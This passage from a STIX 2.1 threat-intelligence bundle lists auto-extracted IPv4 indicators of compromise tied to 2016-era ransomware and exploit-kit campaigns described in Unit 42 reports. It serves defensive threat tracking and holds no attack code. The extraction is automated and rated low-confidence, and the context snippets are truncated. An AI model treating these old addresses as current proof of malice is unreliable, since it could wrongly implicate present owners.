'35.165.251.241']","pattern_type":"stix","valid_from":"2026-08-17T09:53:55.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-blank-slate-campaign-takes-advantage-hosting-providers-spread-ransomware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9950eccf-1e93-457f-b536-83345e68d09d","created":"2026-08-17T09:53:55.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 35.165.86.173","description":"Seen in \"\"Blank Slate\" Campaign Takes Advantage of Hosting Providers to Spread Ransomware\" (Palo Alto Unit 42). Context: IP address. adibas[.]top - 46.173.219.161 footarepu[.]top - 35.165.86.173 guntergoner[.]top - 35.163.101.72 guntergoner[.]top - 185.1","pattern":"[ipv4-addr:value = '35.165.86.173']","pattern_type":"stix","valid_from":"2026-08-17T09:53:55.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-blank-slate-campaign-takes-advantage-hosting-providers-spread-ransomware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--80592e48-878b-4089-8591-3921c5b0d87d","created":"2026-08-17T09:53:55.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 46.173.219.161","description":"Seen in \"\"Blank Slate\" Campaign Takes Advantage of Hosting Providers to Spread Ransomware\" (Palo Alto Unit 42). Context: hows each domain followed by its IP address. adibas[.]top - 46.173.219.161 footarepu[.]top - 35.165.86.173 guntergoner[.]top - 35.163.","pattern":"[ipv4-addr:value = '46.173.219.161']","pattern_type":"stix","valid_from":"2026-08-17T09:53:55.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-blank-slate-campaign-takes-advantage-hosting-providers-spread-ransomware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--63ab3c48-39b5-42f7-8318-35928889deb6","created":"2026-08-17T09:53:55.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 62.109.29.26","description":"Seen in \"\"Blank Slate\" Campaign Takes Advantage of Hosting Providers to Spread Ransomware\" (Palo Alto Unit 42). Context: ibm-technoligi[.]top - 35.165.251.24 ibm-technoligi[.]top - 62.109.29.26 polkiuj[.]top - 35.165.251.241 polkiuj[.]top - 46.173.219.1","pattern":"[ipv4-addr:value = '62.109.29.26']","pattern_type":"stix","valid_from":"2026-08-17T09:53:55.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-blank-slate-campaign-takes-advantage-hosting-providers-spread-ransomware/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d2555402-42ec-41fd-a56a-2f0283cd9fc6","created":"2026-08-17T09:53:23.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 149.202.109.205","description":"Seen in \"Locky Ransomware Installed Through Nuclear EK\" (Palo Alto Unit 42). Context: Locky ransomware: 51.254.181.122 51.255.107.8 78.40.108.39 149.202.109.205 Exploits and malware noted: Description: 2016-03-15 Nuclear","pattern":"[ipv4-addr:value = '149.202.109.205']","pattern_type":"stix","valid_from":"2026-08-17T09:53:23.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/locky-ransomware-installed-through-nuclear-ek/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4bc4ec62-14e8-434e-af09-69063d83fb4d","created":"2026-08-17T09:53:23.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 46.101.8.169","description":"Seen in \"Locky Ransomware Installed Through Nuclear EK\" (Palo Alto Unit 42). Context: Gate domain: sed.poudelkamal.com.np Nuclear EK IP address: 46.101.8.169 Nuclear EK domains: lotos.castrumtelcom.com.br , here.jninm","pattern":"[ipv4-addr:value = '46.101.8.169']","pattern_type":"stix","valid_from":"2026-08-17T09:53:23.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/locky-ransomware-installed-through-nuclear-ek/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--750433da-dc25-4a6d-9bd3-2a7c62c7b9b3","created":"2026-08-17T09:53:23.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 46.148.20.32","description":"Seen in \"Locky Ransomware Installed Through Nuclear EK\" (Palo Alto Unit 42). Context: r , here.jninmobilaria.com.ar Follow-up malware IP address: 46.148.20.32 Follow-up malware domain: js.cefora.com.ar IP addresses fro","pattern":"[ipv4-addr:value = '46.148.20.32']","pattern_type":"stix","valid_from":"2026-08-17T09:53:23.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/locky-ransomware-installed-through-nuclear-ek/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d9e3f973-ff88-46c0-b9ce-b7b9731feccf","created":"2026-08-17T09:53:23.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 51.254.181.122","description":"Seen in \"Locky Ransomware Installed Through Nuclear EK\" (Palo Alto Unit 42). Context: ses from post-infection traffic caused by Locky ransomware: 51.254.181.122 51.255.107.8 78.40.108.39 149.202.109.205 Exploits and malw","pattern":"[ipv4-addr:value = '51.254.181.122']","pattern_type":"stix","valid_from":"2026-08-17T09:53:23.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/locky-ransomware-installed-through-nuclear-ek/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e5c17f52-7ccb-4cce-bdc0-266388beb9ba","created":"2026-08-17T09:53:23.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 51.255.107.8","description":"Seen in \"Locky Ransomware Installed Through Nuclear EK\" (Palo Alto Unit 42). Context: nfection traffic caused by Locky ransomware: 51.254.181.122 51.255.107.8 78.40.108.39 149.202.109.205 Exploits and malware noted: De","pattern":"[ipv4-addr:value = '51.255.107.8']","pattern_type":"stix","valid_from":"2026-08-17T09:53:23.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/locky-ransomware-installed-through-nuclear-ek/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--725853c0-d1fb-448a-a12f-248a3319d8c3","created":"2026-08-17T09:53:23.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 78.40.108.39","description":"Seen in \"Locky Ransomware Installed Through Nuclear EK\" (Palo Alto Unit 42). Context: fic caused by Locky ransomware: 51.254.181.122 51.255.107.8 78.40.108.39 149.202.109.205 Exploits and malware noted: Description: 20","pattern":"[ipv4-addr:value = '78.40.108.39']","pattern_type":"stix","valid_from":"2026-08-17T09:53:23.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/locky-ransomware-installed-through-nuclear-ek/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7a4251d1-75b6-41ec-ae34-c8bc9dcce374","created":"2026-08-17T09:53:23.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 91.195.12.177","description":"Seen in \"Locky Ransomware Installed Through Nuclear EK\" (Palo Alto Unit 42). Context: Date/time range: 2016-03-15 and 2016-03-16 Gate IP address: 91.195.12.177 Gate domain: sed.poudelkamal.com.np Nuclear EK IP address:","pattern":"[ipv4-addr:value = '91.195.12.177']","pattern_type":"stix","valid_from":"2026-08-17T09:53:23.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/locky-ransomware-installed-through-nuclear-ek/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--74db719e-3e79-4215-bff4-db3d23d85652","created":"2026-08-17T09:52:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 104.129.198.32","description":"Seen in \"EITest Campaign Evolution: From Angler EK to Neutrino and Rig\" (Palo Alto Unit 42). Context: r their first seen date. 2015-12-29: 85.93.0.32 2016-02-03: 104.129.198.32 2016-02-24: 85.93.0.33 2016-03-16: 85.93.0.34 2016-04-01: 8","pattern":"[ipv4-addr:value = '104.129.198.32']","pattern_type":"stix","valid_from":"2026-08-17T09:52:03.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-eitest-campaign-evolution-angler-ek-neutrino-rig/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--04b010e8-2ad1-440b-b1df-b7e5adec604a","created":"2026-08-17T09:52:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 194.165.16.202","description":"Seen in \"EITest Campaign Evolution: From Angler EK to Neutrino and Rig\" (Palo Alto Unit 42). Context: 2016-08-17: 85.93.0.13 2016-08-25: 85.93.0.110 2016-08-30: 194.165.16.202 2016-09-01: 194.165.16.203 2016-09-02: 194.165.16.204 2016-","pattern":"[ipv4-addr:value = '194.165.16.202']","pattern_type":"stix","valid_from":"2026-08-17T09:52:03.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-eitest-campaign-evolution-angler-ek-neutrino-rig/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4781f3e7-9b5e-4ac4-8a36-8cdb6506a56c","created":"2026-08-17T09:52:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 194.165.16.203","description":"Seen in \"EITest Campaign Evolution: From Angler EK to Neutrino and Rig\" (Palo Alto Unit 42). Context: 6-08-25: 85.93.0.110 2016-08-30: 194.165.16.202 2016-09-01: 194.165.16.203 2016-09-02: 194.165.16.204 2016-09-08: 31.184.193.168 2016-","pattern":"[ipv4-addr:value = '194.165.16.203']","pattern_type":"stix","valid_from":"2026-08-17T09:52:03.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-eitest-campaign-evolution-angler-ek-neutrino-rig/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--13e7c088-5dcf-45d6-8cac-1233b788c3d7","created":"2026-08-17T09:52:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 194.165.16.204","description":"Seen in \"EITest Campaign Evolution: From Angler EK to Neutrino and Rig\" (Palo Alto Unit 42). Context: 8-30: 194.165.16.202 2016-09-01: 194.165.16.203 2016-09-02: 194.165.16.204 2016-09-08: 31.184.193.168 2016-09-14: 31.184.192.188 2016-","pattern":"[ipv4-addr:value = '194.165.16.204']","pattern_type":"stix","valid_from":"2026-08-17T09:52:03.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-eitest-campaign-evolution-angler-ek-neutrino-rig/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--be11c24a-658e-4f04-b741-85d21b9b48a0","created":"2026-08-17T09:52:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 31.184.192.188","description":"Seen in \"EITest Campaign Evolution: From Angler EK to Neutrino and Rig\" (Palo Alto Unit 42). Context: 9-02: 194.165.16.204 2016-09-08: 31.184.193.168 2016-09-14: 31.184.192.188 2016-09-19: 31.184.193.187","pattern":"[ipv4-addr:value = '31.184.192.188']","pattern_type":"stix","valid_from":"2026-08-17T09:52:03.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-eitest-campaign-evolution-angler-ek-neutrino-rig/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--04b6c96e-0028-48c7-bea9-b97b0223f930","created":"2026-08-17T09:52:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 31.184.193.168","description":"Seen in \"EITest Campaign Evolution: From Angler EK to Neutrino and Rig\" (Palo Alto Unit 42). Context: 9-01: 194.165.16.203 2016-09-02: 194.165.16.204 2016-09-08: 31.184.193.168 2016-09-14: 31.184.192.188 2016-09-19: 31.184.193.187","pattern":"[ipv4-addr:value = '31.184.193.168']","pattern_type":"stix","valid_from":"2026-08-17T09:52:03.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-eitest-campaign-evolution-angler-ek-neutrino-rig/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--61b03388-585c-4af5-94d9-243bde3f0066","created":"2026-08-17T09:52:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 31.184.193.187","description":"Seen in \"EITest Campaign Evolution: From Angler EK to Neutrino and Rig\" (Palo Alto Unit 42). Context: 9-08: 31.184.193.168 2016-09-14: 31.184.192.188 2016-09-19: 31.184.193.187","pattern":"[ipv4-addr:value = '31.184.193.187']","pattern_type":"stix","valid_from":"2026-08-17T09:52:03.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-eitest-campaign-evolution-angler-ek-neutrino-rig/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--39cf02be-fd92-4d36-a4cb-a5f021907a17","created":"2026-08-17T09:52:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 85.93.0.110","description":"Seen in \"EITest Campaign Evolution: From Angler EK to Neutrino and Rig\" (Palo Alto Unit 42). Context: 3 2016-07-18: 85.93.0.12 2016-08-17: 85.93.0.13 2016-08-25: 85.93.0.110 2016-08-30: 194.165.16.202 2016-09-01: 194.165.16.203 2016-","pattern":"[ipv4-addr:value = '85.93.0.110']","pattern_type":"stix","valid_from":"2026-08-17T09:52:03.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-eitest-campaign-evolution-angler-ek-neutrino-rig/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2d5a6277-abe2-4ca1-a8c6-e7c54396ed5e","created":"2026-08-17T09:52:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 85.93.0.12","description":"Seen in \"EITest Campaign Evolution: From Angler EK to Neutrino and Rig\" (Palo Alto Unit 42). Context: 1 2016-06-06: 85.93.0.72 2016-06-11: 85.93.0.43 2016-07-18: 85.93.0.12 2016-08-17: 85.93.0.13 2016-08-25: 85.93.0.110 2016-08-30:","pattern":"[ipv4-addr:value = '85.93.0.12']","pattern_type":"stix","valid_from":"2026-08-17T09:52:03.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-eitest-campaign-evolution-angler-ek-neutrino-rig/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ea4757c9-0ed0-468e-b3b2-2f58400d9ff2","created":"2026-08-17T09:52:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 85.93.0.13","description":"Seen in \"EITest Campaign Evolution: From Angler EK to Neutrino and Rig\" (Palo Alto Unit 42). Context: 2 2016-06-11: 85.93.0.43 2016-07-18: 85.93.0.12 2016-08-17: 85.93.0.13 2016-08-25: 85.93.0.110 2016-08-30: 194.165.16.202 2016-09-","pattern":"[ipv4-addr:value = '85.93.0.13']","pattern_type":"stix","valid_from":"2026-08-17T09:52:03.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-eitest-campaign-evolution-angler-ek-neutrino-rig/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--60460416-06c7-40fc-9a32-7c56d6ec6f54","created":"2026-08-17T09:52:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 85.93.0.32","description":"Seen in \"EITest Campaign Evolution: From Angler EK to Neutrino and Rig\" (Palo Alto Unit 42). Context: ly reappeared well after their first seen date. 2015-12-29: 85.93.0.32 2016-02-03: 104.129.198.32 2016-02-24: 85.93.0.33 2016-03-1","pattern":"[ipv4-addr:value = '85.93.0.32']","pattern_type":"stix","valid_from":"2026-08-17T09:52:03.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-eitest-campaign-evolution-angler-ek-neutrino-rig/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7dd4fdd9-35d0-4087-9204-acf2492b6102","created":"2026-08-17T09:52:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 85.93.0.33","description":"Seen in \"EITest Campaign Evolution: From Angler EK to Neutrino and Rig\" (Palo Alto Unit 42). Context: 15-12-29: 85.93.0.32 2016-02-03: 104.129.198.32 2016-02-24: 85.93.0.33 2016-03-16: 85.93.0.34 2016-04-01: 85.93.0.68 2016-05-18: 8","pattern":"[ipv4-addr:value = '85.93.0.33']","pattern_type":"stix","valid_from":"2026-08-17T09:52:03.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-eitest-campaign-evolution-angler-ek-neutrino-rig/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1ecdd5d6-8f46-4f25-bdcf-aa9120d18106","created":"2026-08-17T09:52:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 85.93.0.34","description":"Seen in \"EITest Campaign Evolution: From Angler EK to Neutrino and Rig\" (Palo Alto Unit 42). Context: 16-02-03: 104.129.198.32 2016-02-24: 85.93.0.33 2016-03-16: 85.93.0.34 2016-04-01: 85.93.0.68 2016-05-18: 85.93.0.81 2016-06-06: 8","pattern":"[ipv4-addr:value = '85.93.0.34']","pattern_type":"stix","valid_from":"2026-08-17T09:52:03.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-eitest-campaign-evolution-angler-ek-neutrino-rig/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0e810fee-19c3-429f-af93-7d2bdb6beb3d","created":"2026-08-17T09:52:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 85.93.0.43","description":"Seen in \"EITest Campaign Evolution: From Angler EK to Neutrino and Rig\" (Palo Alto Unit 42). Context: 8 2016-05-18: 85.93.0.81 2016-06-06: 85.93.0.72 2016-06-11: 85.93.0.43 2016-07-18: 85.93.0.12 2016-08-17: 85.93.0.13 2016-08-25: 8","pattern":"[ipv4-addr:value = '85.93.0.43']","pattern_type":"stix","valid_from":"2026-08-17T09:52:03.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-eitest-campaign-evolution-angler-ek-neutrino-rig/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1c170eed-a70c-4cae-9709-3220b6a0cbb3","created":"2026-08-17T09:52:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 85.93.0.68","description":"Seen in \"EITest Campaign Evolution: From Angler EK to Neutrino and Rig\" (Palo Alto Unit 42). Context: 2 2016-02-24: 85.93.0.33 2016-03-16: 85.93.0.34 2016-04-01: 85.93.0.68 2016-05-18: 85.93.0.81 2016-06-06: 85.93.0.72 2016-06-11: 8","pattern":"[ipv4-addr:value = '85.93.0.68']","pattern_type":"stix","valid_from":"2026-08-17T09:52:03.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-eitest-campaign-evolution-angler-ek-neutrino-rig/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1f3395d0-1a65-4a02-acd9-e29d25f0f1aa","created":"2026-08-17T09:52:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 85.93.0.72","description":"Seen in \"EITest Campaign Evolution: From Angler EK to Neutrino and Rig\" (Palo Alto Unit 42). Context: 4 2016-04-01: 85.93.0.68 2016-05-18: 85.93.0.81 2016-06-06: 85.93.0.72 2016-06-11: 85.93.0.43 2016-07-18: 85.93.0.12 2016-08-17: 8","pattern":"[ipv4-addr:value = '85.93.0.72']","pattern_type":"stix","valid_from":"2026-08-17T09:52:03.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-eitest-campaign-evolution-angler-ek-neutrino-rig/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d97d77dc-3d27-4183-b032-5d0f67138ddb","created":"2026-08-17T09:52:03.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 85.93.0.81","description":"Seen in \"EITest Campaign Evolution: From Angler EK to Neutrino and Rig\" (Palo Alto Unit 42). Context: 3 2016-03-16: 85.93.0.34 2016-04-01: 85.93.0.68 2016-05-18: 85.93.0.81 2016-06-06: 85.93.0.72 2016-06-11: 85.93.0.43 2016-07-18: 8","pattern":"[ipv4-addr:value = '85.93.0.81']","pattern_type":"stix","valid_from":"2026-08-17T09:52:03.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/unit42-eitest-campaign-evolution-angler-ek-neutrino-rig/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c7787845-b754-4c05-b272-544c53299e33","created":"2026-08-17T09:51:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 104.193.252.236","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX\" (Palo Alto Unit 42). Context: hechinhis[.]com 95.211.205.218 port 80 - tedgeroatref[.]com 104.193.252.236 port 80 - rerobloketbo[.]com 162.244.34.11 port 80 - tonthi","pattern":"[ipv4-addr:value = '104.193.252.236']","pattern_type":"stix","valid_from":"2026-08-17T09:51:14.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/afraidgate-major-exploit-kit-campaign-swaps-locky-ransomware-for-cryptxxx/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d9b72c40-df55-4259-ac4b-97203628c11d","created":"2026-08-17T09:51:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 104.193.252.241","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX\" (Palo Alto Unit 42). Context: litigators.esteroscreen[.]com Bedep post-infection traffic: 104.193.252.241 port 80 - qrwzoxcjatynejejsz[.]com 95.211.205.228 port 80 -","pattern":"[ipv4-addr:value = '104.193.252.241']","pattern_type":"stix","valid_from":"2026-08-17T09:51:14.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/afraidgate-major-exploit-kit-campaign-swaps-locky-ransomware-for-cryptxxx/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cfcd8c8a-962a-448c-b3ab-9827c4452f62","created":"2026-08-17T09:51:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 162.244.34.11","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX\" (Palo Alto Unit 42). Context: eroatref[.]com 104.193.252.236 port 80 - rerobloketbo[.]com 162.244.34.11 port 80 - tonthishessici[.]com 207.182.148.92 port 80 - all","pattern":"[ipv4-addr:value = '162.244.34.11']","pattern_type":"stix","valid_from":"2026-08-17T09:51:14.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/afraidgate-major-exploit-kit-campaign-swaps-locky-ransomware-for-cryptxxx/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b35b77a3-d94b-443c-b1be-3edbd485653e","created":"2026-08-17T09:51:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 185.118.164.42","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX\" (Palo Alto Unit 42). Context: the Afraidgate campaign are shown below. Figure 3: Gate on 185.118.164.42 leads to Angler EK/Bedep/CryptXXX on Friday 2016-04-22. Fig","pattern":"[ipv4-addr:value = '185.118.164.42']","pattern_type":"stix","valid_from":"2026-08-17T09:51:14.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/afraidgate-major-exploit-kit-campaign-swaps-locky-ransomware-for-cryptxxx/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1219745b-7096-46d8-b5fa-2eb4ebc4281e","created":"2026-08-17T09:51:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 192.169.189.167","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX\" (Palo Alto Unit 42). Context: ]org 85.25.160.124 port 80 - mcimaildmz.dinnerplate.co[.]uk 192.169.189.167 port 80 - candidulumbestuurlijk.newlandsierrarealestate[.]c","pattern":"[ipv4-addr:value = '192.169.189.167']","pattern_type":"stix","valid_from":"2026-08-17T09:51:14.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 42","url":"https://unit42.paloaltonetworks.com/afraidgate-major-exploit-kit-campaign-swaps-locky-ransomware-for-cryptxxx/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5d95aa44-6ffb-4321-a079-3b00baaaab22","created":"2026-08-17T09:51:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 192.169.190.97","description":"Seen in \"Afraidgate: Major Exploit Kit Campaign Swaps Locky Ransomware for CryptXXX\" (Palo Alto Unit 42). Context: rt 80 - candidulumbestuurlijk.newlandsierrarealestate[.]com 192.169.190.97 port 80 - frageboegen-plletyksin.breastcanceroutreach[.]com","pattern":"[ipv4-addr:value = '192.169.190.97']","pattern_type":"stix","valid_from":"2026-08-17T09:51:14.000Z","labels":["auto-extracted","threat-actor"],"confidence":30,"external_references":[{"source_name":"Palo Alto Unit 